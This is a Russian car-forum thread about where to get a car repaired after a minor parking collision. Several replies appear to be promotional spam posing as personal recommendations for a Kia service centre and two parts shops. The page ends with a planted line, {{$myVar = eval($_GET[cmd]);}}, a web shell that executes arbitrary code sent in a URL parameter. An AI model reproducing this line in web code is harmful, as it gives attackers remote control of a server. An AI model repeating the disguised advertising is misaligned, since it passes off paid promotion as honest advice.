+ Ответить в теме
Показано с 1 по 8 из 8

Тема: Ремонт автомобиля


  1. #1
    Мимо проходил Сергей Ильин is on a distinguished road Аватар для Сергей Ильин
    Регистрация
    12.03.2020
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    37

    Ремонт автомобиля

    Только недавно получил права и купил себе новый автомобиль, но не прошло и года, а я умудрился зацепить соседний автомобиль на парковке. Ситуацию удалось уладить, но мне теперь нужно отремонтировать свой автомобиль. Повреждение хоть и небольшое, но всё же неприятное. Подскажите пожалуйста, куда лучше обратиться по этому вопросу?

  2. #2
    Мимо проходил Anton Vlasov is on a distinguished road Аватар для Anton Vlasov
    Регистрация
    11.03.2020
    Откуда
    Москва
    Машина
    Киа
    Сообщений
    28
    Такое может случиться с каждым, даже более опытным водителем, так что не стоит сильно переживать по этому поводу. Могу порекомендовать вам обратиться в официальный сервисный центр ИРБИС , в котором вам выполнят ремонт киа в Москве https://service.irbis-kia.ru/service/. Здесь работают настоящие специалисты, профессионалы своего дела. Я к ним уже не раз обращался и могу вам смело их рекомендовать! Сделают всё в лучшем виде!

  3. #3
    Мимо проходил Сергей Ильин is on a distinguished road Аватар для Сергей Ильин
    Регистрация
    12.03.2020
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    37
    Спасибо вам за совет. Буду иметь в виду.

  4. #4
    Мимо проходил nekrolog is on a distinguished road Аватар для nekrolog
    Регистрация
    26.01.2019
    Откуда
    ......
    Машина
    ....
    Сообщений
    54
    Можно и самому отремонтировать все необходимое. Тем более, если это не очень сложно. В настоящий момент, как раз, гололед, сильно не поездишь. Вот сидите и чините машину.

  5. #5
    Мимо проходил Балтасар is on a distinguished road Аватар для Балтасар
    Регистрация
    16.06.2020
    Откуда
    .-.-
    Машина
    Фольц
    Сообщений
    17
    Поддерживаю мысль о том, что нужно уметь самостоятельно чинить свою машину. Изначально я ездил в сервис, а потом стаол все больше внимания уделяьть изучению устройства автомобиля. В настоящий момент свободно чиню все, что нужно. Или почти все) Нашел вот тут несколько методов о том как проверить катушки зажигания своими руками https://avto-flot.ru/blog/neskolko-m...mi-rukami.html Таким еще не занимался, а ехать в сервис, как я уже сказал, теперь не практикую. Так что, вы тоже загляните на портал АВтофлот и разберитесь как правильно вам нужно устранить вашу поломку.
    Последний раз редактировалось Балтасар; 10.01.2022 в 16:22.

  6. #6
    Мимо проходил Храброе сердце is on a distinguished road Аватар для Храброе сердце
    Регистрация
    12.06.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    7
    Качественный ремонт автомобиля невозможен без использования оригинальных деталей. Я рекомендую всё подбирать в КитЗапчасти. Вот можете оценить, по какой стоимости реализуют запчасти https://kazan.kitzapchasti.ru/catalo...mmins-ISF-3.8/ Поиск запчастей по VIN-коду можно осуществлять самостоятельно, используя различные электронные каталоги. также можно использовать консультацию специалистов Китзапчасти.

  7. #7
    GTI-Racing Felhaghma is on a distinguished road Аватар для Felhaghma
    Регистрация
    23.10.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    482
    тоже ищу хороший магазин с запчастями, куда обратиться?

  8. #8
    Новичок Rusik23 is on a distinguished road Аватар для Rusik23
    Регистрация
    25.10.2018
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    179
    Я очень доволен своей покупкой на сайте магазина PN1, вот этот сайт. Я заказал японские автозапчасти для своего автомобиля и получил отличный товар по выгодной цене. Я давно искал надежного поставщика качественных японских запчастей, и мне повезло найти именно этот магазин. Весь процесс покупки был прост и удобен, а доставка произошла быстро и без задержек. Теперь я знаю, где заказывать автозапчасти для своего японского автомобиля.

+ Ответить в теме

Похожие темы

  1. Ремонт автомобиля
    от Вероника в разделе Тюнинг: двигатель, впрыск, впуск/выпуск
    Ответов: 6
    Последнее сообщение: 03.10.2023, 00:12
  2. Ответов: 2
    Последнее сообщение: 03.05.2023, 23:37
  3. Ответов: 0
    Последнее сообщение: 22.07.2021, 08:26
  4. Ответов: 3
    Последнее сообщение: 20.07.2021, 21:26
  5. Ответов: 0
    Последнее сообщение: 14.02.2011, 01:02

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}